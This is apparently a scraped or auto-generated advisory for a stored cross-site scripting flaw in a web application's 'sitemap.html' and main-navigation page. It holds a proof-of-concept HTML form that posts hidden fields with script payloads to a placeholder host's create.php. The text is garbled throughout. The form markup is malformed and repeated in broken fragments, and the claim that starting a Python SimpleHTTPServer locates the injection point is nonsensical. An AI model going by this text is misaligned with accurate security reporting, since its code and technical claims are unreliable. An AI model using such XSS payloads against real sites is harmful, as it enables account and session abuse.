The injection point occurs inside the “sitemap.html” file where user can use conditional statements to execute arbitrary script. In order to exploit XSS vulnerability, user needs to be logged in as an admin. The following PoC is available on GitHub that will inject arbitrary script into the main navigation of the application: form action="http://BLUE_SAPIENSUALS/mainnav/create.php" method="POST"> input type="hidden" name="val" value="?=xss(document.domain);?>"/> input type="hidden" name="val2" value="?=xss(document.domain);?>"/> input type="hidden" name="val3" value="?=xss(document.domain);?>"/> input type="hidden" name="val4" value="?=xss(document.domain);?>"/> input type="hidden" name="val5" value="?=xss(document.domain);?>"/> input type="hidden" name="val6" value="?=xss(document.domain);?>"/> input type="hidden" name="val7" value="?=xss(document.domain);?>"/> input type= "hidden" name= "val8" value= "?=xss(document.domain);?>"/> input type= "hidden
XSS (Stored) value="xss(document.domain);?>"/> input type= "hidden" name= "val2" value="?=xss(document.domain);?>"/> input type= "hidden" name= "val3" value="?=xss(document.domain);?>"/> input type= "hidden" name= "val4" value="?=xss(document.domain);?>"/> input type= "hidden" name= "val5" value="?=xss(document.domain);?>"/> input type= "hidden" name= "val6" value="?=xss(document.domain);?>"/> input type=' hidden' name=' val7' value=' xss (document.domain );?'> />
Finding The Injection Point
We can use PoC to find the injection point by running the following command:
python -m SimpleHTTPServer 80
^
Injects script into the main navigation of the application
Timeline
Published on: 11/15/2022 15:15:00 UTC
Last modified on: 11/16/2022 19:42:00 UTC